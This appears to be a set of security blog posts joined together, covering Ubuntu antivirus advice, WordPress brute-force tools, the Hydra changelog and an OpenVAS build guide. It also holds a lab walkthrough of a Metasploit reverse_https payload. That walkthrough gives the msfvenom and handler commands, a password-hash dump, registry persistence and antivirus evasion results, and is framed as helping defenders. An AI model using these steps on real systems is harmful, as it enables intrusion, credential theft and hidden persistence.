Now for a quick background check; Ubuntu is stable, easy to use and a rock solid desktop. I have been using it since the Warty Warthog (Ubuntu 4.10 ~ 2004), it runs on all my systems: home server, virtual servers and laptops.

Back to the question:

An Ubuntu Virus?

, the short answer is no there is no significant threats to an Ubuntu system from a virus. There are cases where you may want to run it on a desktop or server but for the majority of users, you do not need antivirus on Ubuntu.

Keep in mind that while you don’t need anti-virus does not mean you don’t need to be security aware.

Members of the Ubuntu community have put together an excellent introduction to Security on Ubuntu Linux. There are also free firewall test and other scanning tools available to ensure your network is correctly configured.

Once you have familiarized yourself with the concepts and information in the guide; if you are really keen (or paranoid) I would suggest a security addition to your systems, it is known as Host Based Intrusion Detection system. My HIDS agent of choice is ossec.net, it will not detect a virus as such but it does alert you to anomalous behavior on the system by examining system logs and watching the file system. If you chose to run OSSEC you probably do not need to run rkhunter and chkrootkit that are mentioned on the Basic Security Wiki page.

This old install guide I did for OSSEC on Ubuntu has the basic steps in getting it up and running.

Finally if you have a need for running anti-virus on Ubuntu, there is a good article on the Ubuntu wiki that has links to the popular and free antivirus software available (such as AVG, Avast, Avira) and the open source clamAV.

Recall back in November last year when we published a history of sql injection attacks, and followed that up with a sql injection tutorial. The purpose of these publications is to increase awareness of sql injection and to familiarize users with securing dynamic web applications. For testing and understanding the attack we have an online sql injection test that allows anyone to quickly test a HTTP GET based URL for a sql injection vulnerability.

It is normal to assume that when implementation of security has a cost associated with it; in the form of development time or code fixing, there will be those who hold off until disaster strikes. However it seems that unless that disaster directly affects the organisation, pushing applications out that have been untested or security reviewed continues to be the normal practice.

Around the same time we have been putting a wordpress infographic that highlights some of the findings from our analysis of wordpress usage among the top 100K sites (as rated by Alexa).

WordPress Usage in the Top 100K Infographic

Hit the link for the full list – SQL Injection Scanners

First of course there is the HackerTarget.com scan, externally facing and coming in at a fairly high level. The system downloads some of your pages, does analysis, checks a few additional links and gives you a tidy little report detailing any security issues discovered.

Our scan does not perform brute forcing of accounts, passwords or plugins. Brute Forcing is more appropriate in a targeted pen-test or black-box vulnerability assessment.

Simply put brute forcing for:

Additionally username’s can also be gathered through some WordPress themes, RSS feeds, and author page URI’s such as /blog/author/admin/.

These tools and scripts that can be utilized in your Penetration Testing of WordPress.

Metasploit has a module for enumerating usernames and brute forcing passwords. It is solid and convenient; everyone has Metasploit installed… don’t they?

An NSE (nmap scripting engine) script was released for Nmap that does plugin brute forcing.

Just in the last few days a new tool hit the tubes wpscan. Still under development it does a few different checks including brute forcing for accounts.

All the tools referenced above are dedicated towards external testing of wordpress installations. There are other options that involve installation of plugins into the wordpress installations for deeper monitoring.

Let’s first look at a common locked down Corporate Network. Then we will show how pwnage is not difficult with this new Payload.

Lab Setup
I am simulating the network with 3 virtual guest machines and the host Ubuntu Linux system. 1 virtual guest will act as the Firewall and Proxy, while the 2 other guests are Windows clients that will be the targets. The laptop host in this lab is the attacker on the Internet.

On the virtual gateway Smoothwall box I configured DHCP, Proxy, Snort and Firewall Rules to block outbound traffic. Only opened 22 (for sftp) and proxy port (tcp 800). This has simulated the corporate network in the diagram above.

Now build the malicious executable.

On the Laptop I am running Metasploit Framework 3.7.2.

/opt/framework-3.7.2/msf3# msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=192.168.56.1 LPORT=443 > evil_https.exe

Now to setup the listener on the laptop.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.56.1:443/
[*] Starting the payload handler…
msf exploit(handler) >

Use scp or whatever to copy evil_https.exe to the Windows XP system and then run it.

Back in the console on the Linux host we see.

[*] 192.168.56.101:43681 Request received for /INITM…
[*] 192.168.56.101:43681 Staging connection for target /INITM received…
[*] Patched transport at offset 486516…
[*] Patched URL at offset 486248…
[*] Patched Expiration Timeout at offset 641856…
[*] Patched Communication Timeout at offset 641860…
[*] Meterpreter session 1 opened (192.168.56.1:443 -> 192.168.56.101:43681) at Fri Jul 15 12:09:01 +1000 2011

meterpreter > hashdump
Administrator:500:aad3b435b51404eexad3e435t51404ee:31d6cse0dfe6ae931b73c5ed7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:e4c292ecc2957ce7fb630fc6166aa510:235f3388ca0a29e8494d047362de1507:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c77865e3c4b213df710209775e335e62:::

Evil_https.exe connected to the listener on Laptop. All communication took place over the proxy. Looking at netstat on the client XP machine we only see HTTPS connections to the proxy. A very normal type of connection.

How solid is the connection? Lets reboot the smoothwall proxy host.

Meterpreter session appears to hang during the reboot. Type a command; wait…. success!! The session over the proxy using HTTPS is re-established. I did not have to re-run executable.

meterpreter > ipconfig

AMD PCNET Family PCI Ethernet Adapter – Packet Scheduler Miniport
Hardware MAC: 08:00:27:70:63:0d
IP Address : 10.10.10.199
Netmask : 255.255.255.0

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

meterpreter > screenshot
Screenshot saved to: /opt/framework-3.7.2/msf3/bFjkdUHa.jpeg

Lets improve things and make it persistent on the client so that when the corporate user takes his laptop home we get a session from home, and then another session the next morning from the corporate network.

These commands manipulate the registry and will add evil_https.exe to the start-up programs on the client XP machine.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (1):

VBoxTray

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v evil -d ‘C:\windows\evil_https.exe’
Successful set evil.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (3):

VBoxTray
evil

meterpreter >

Next I rebooted Windows XP and we received a new session on the listener after the reboot.

msf exploit(handler) >
[*] 192.168.56.101:55182 Request received for /INITM…
[*] 192.168.56.101:55182 Staging connection for target /INITM received…
[*] Patched transport at offset 486516…
[*] Patched URL at offset 486248…
[*] Patched Expiration Timeout at offset 641856…
[*] Patched Communication Timeout at offset 641860…
[*] Meterpreter session 2 opened (192.168.56.1:443 -> 192.168.56.101:55182) at Fri Jul 15 12:43:31 +1000 2011

Nice, now as mentioned in the release blog post it should also be possible to quit out of the metasploit console and re-establish a session without touching the WinXP box.

I quit from Metasploit Console. Went and had some lunch.

Ok, after a great lunch I fired up the msfconsole using the same settings as before. I do not touch the XP machine.

/opt/framework-3.7.2/msf3# ./msfconsole

| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ — –=[ 711 exploits - 360 auxiliary - 58 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13116 updated 8 days ago (2011.07.07)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://192.168.56.1:443/
[*] Starting the payload handler…
msf exploit(handler) >
[*] 192.168.56.101:40252 Request received for /CONN_pJGJgpWGAzUlDCTZ/…
[*] Incoming orphaned session CONN_pJGJgpWGAzUlDCTZ, reattaching…
[*] Meterpreter session 1 opened (192.168.56.1:443 -> 192.168.56.101:40252) at Fri Jul 15 13:57:34 +1000 2011

Wow, that is nice the client machine reconnected. This new payload is stable and undeniably dangerous.

Righto, same deal on fully patched Windows7 Enterprise with “Work Network Settings” (no Anti-Virus).

meterpreter >
[*] 192.168.56.101:50910 Request received for /INITM…
[*] 192.168.56.101:50910 Staging connection for target /INITM received…
[*] Patched transport at offset 486516…
[*] Patched URL at offset 486248…
[*] Patched Expiration Timeout at offset 641856…
[*] Patched Communication Timeout at offset 641860…
[*] Meterpreter session 2 opened (192.168.56.1:443 -> 192.168.56.101:50910) at Fri Jul 15 14:22:07 +1000 2011

meterpreter >
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > ipconfig

Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC: 08:00:27:ef:f4:61
IP Address : 10.10.10.198
Netmask : 255.255.255.0

meterpreter > sysinfo
System Language : en_AU
OS : Windows 7 (Build 7600).
Computer : TEST-VM2
Architecture : x86
Meterpreter : x86/win32
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target…
[*] Checking for contermeasures…
[*] Getting Windows Built in Firewall configuration…
[*]
[*] Domain profile configuration:
[*] ——————————————————————-
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] ——————————————————————-
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Checking DEP Support Policy…
meterpreter >

Booya!

Note that both the client systems were not running any Anti-virus. The executable may have been blocked if they were.

Lets check virustotal.com. Remember this is a vanilla payload from msfvenom. I have not used exe templates or attempted additional tricks to avoid Anti-virus detection.

Quite a few anti-virus programs detected the executable as dangerous (27 out of 43). Let’s have a closer look at corporate favourites like Symantec and Trend.

Symantec and Trend did not detect the executable as dangerous.

By understanding the attack you can then start to discuss and find effective ways to defend against these types of targeted attacks.

While doing that we have also pushed out many changes and updates to the scanning system and site.

If you find any bugs, drop us a line.

Sony has been having all sorts of data breach problems lately — namely a million passwords from the Sony Pictures site, 77 million accounts from the PlayStation Network, and nearly 25 million user accounts from Online Entertainment. I was curious how these recent attacks compared to the largest known data loss incidents, so I headed over to DataLossDB. Sony now holds spots #4 and #10 for largest breaches of all time.

Recently I put together a slide rocket of 10 years of SQL Injection History, however I don’t think my design Fu is quite up there with the flowing data guys.

Largest Data Breaches of All Time – FlowingData.com

CHANGELOG for 6.4
=================
* Update SIP module to extract and use external IP addr return from server error to bypass NAT
* Update SIP module to use SASL lib
* Update email modules to check clear mode when TLS mode failed
* Update Oracle Listener module to work with Oracle DB 9.2
* Update LDAP module to support Windows 2008 active directory simple auth
* Fix to the connection adaptation engine which would loose planned attempts
* Fix make script for CentOS, reported by ya0wei
* Print error when a service limits connections and few pairs have to be tested
* Improved Mysql module to only init/close when needed
* Added patch from the FreeBSD maintainers
* Module usage help does not need a target to be specified anymore
* configure script now honors /etc/ld.so.conf.d/ directory

Hydra 6.4 Released

Lets get going, we are going to build a server version from source on Ubuntu 10.04 LTS, will give 11.04 a go in the near future. These packages should get you going.

apt-get install build-essential cmake doxygen uuid libgpgme11 libgpgme11-dev libpcap0.8-dev libpcap0.8 uuid-dev pkg-config libglib2.0* autoconf libgnutls-dev bison sqlite3 libsqlite3-dev xsltproc libxslt1-dev libmicrohttpd-dev xmltoman

Information for getting the wmi library built is here, the following is a fast summary.

wget http://www.openvas.org/download/wmi/wmi-1.3.14.tar.bz2

tar xjvf wmi-1.3.14.tar.bz2

To enable the WMI integration in OpenVAS, a patch needs to be applied to the
source you just downloaded.

wget http://www.openvas.org/download/wmi/openvas-wmi-1.3.14.patch

Copy the patch to the wmi-1.3.14 directory you just created and apply the patch
with the following command:

$ patch -p1 < openvas-wmi-1.3.14.patch

In the wmi-1.3.14 directory, execute the following commands:
cd Samba/source
./autogen.sh
./configure
make proto all
make libraries

bash install-libwmiclient.sh

Now we should be good to go on the main application building.

wget http://wald.intevation.org/frs/download.php/862/openvas-scanner-3.2.3.tar.gz
wget http://wald.intevation.org/frs/download.php/871/openvas-manager-2.0.4.tar.gz
wget http://wald.intevation.org/frs/download.php/853/openvas-administrator-1.1.1.tar.gz
wget http://wald.intevation.org/frs/download.php/857/greenbone-security-assistant-2.0.1.tar.gz
wget http://wald.intevation.org/frs/download.php/860/gsd-1.1.1.tar.gz
wget http://wald.intevation.org/frs/download.php/851/openvas-cli-1.1.2.tar.gz

tar zxvf openvas-cli-1.1.2.tar.gz
tar zxvf openvas-libraries-4.0.5.tar.gz
tar zxvf openvas-manager-2.0.4.tar.gz
tar zxvf openvas-scanner-3.2.3.tar.gz
tar zxvf openvas-administrator-1.1.1.tar.gz

cd openvas-libraries-4.0.5
cmake .
make
make install

cd openvas-scanner-3.2.3
cmake .
make
make install

cd openvas-cli-1.1.2
cmake .
make
make install

cd openvas-administrator-1.1.1
cmake .
make
make install

cd greenbone-security-assistant-2.0.1
cmake .
make
make install

ldconfig

Run the initial commands build your certificate and create an openvas user.

openvas-mkcert
openvas-adduser

openvas-nvt-sync
< plugins scroll by -- snip >
[i] Download complete
[i] Checking dir: ok
[i] Checking MD5 checksum: ok

openvassd
Loading the plugins… 8058 (out of 21431)

Looking good so far.

There are a lot of components to this installation. There is a handy script that checks your OpenVas configuration for problems. Download it, save as openvas-check.sh and run it.

wget http://wald.intevation.org/plugins/scmsvn/viewcvs.php/*checkout*/trunk/tools/openvas-check-setup?root=openvas -O openvas-check.sh

./openvas-check.sh

openvas-check-setup 2.0.6
Test completeness and readiness of OpenVAS-4

Please report us any non-detected problems and
help us to improve this check routine:

http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss

Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the problem.

Use the parameter –server to skip checks for client tools
like GSD and OpenVAS-CLI.

Step 1: Checking OpenVAS Scanner …
OK: OpenVAS Scanner is present in version 3.2.3.
OK: OpenVAS Scanner CA Certificate is present as /usr/local/var/lib/openvas/CA/cacert.pem.
OK: NVT collection in /usr/local/var/lib/openvas/plugins contains 21431 NVTs.
Step 2: Checking OpenVAS Manager …
OK: OpenVAS Manager is present in version 2.0.4.
OK: OpenVAS Manager client certificate is present as /usr/local/var/lib/openvas/CA/clientcert.pem.
ERROR: No OpenVAS Manager database found. (Tried: /usr/local/var/lib/openvas/mgr/tasks.db)
FIX: Run ‘openvasmd –rebuild’ while OpenVAS Scanner is running.

ERROR: Your OpenVAS-4 installation is not yet complete!

Please follow the instructions marked with FIX above and run this
script again.

If you think this result is wrong, please report your observation
and help us to improve this check routine:

http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss

Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the problem.

Notice how the check script detects the problem and prompts you with a fix.

openvasmd –rebuild

We still have an error in openvas-check.sh results, but this is because we have not built the GSD (Greenbone security desktop). We are not building the desktop client as this is a remote server.

openvasd
gsad
openvasmd

This should start up the services. The Greenbone Security Assistant runs on 80 and 443. You can use command line options force ssl. I have done some initial testing and have to say its impressive. Fast, responsive and intuitive – unlike Nessus and its flash based web gui that I find to be clunky and difficult to manage.

Version 4.0 of OpenVas is good at this stage. I will definitely have to do more testing and look at migrating our version 3 based online scanning solution to version 4.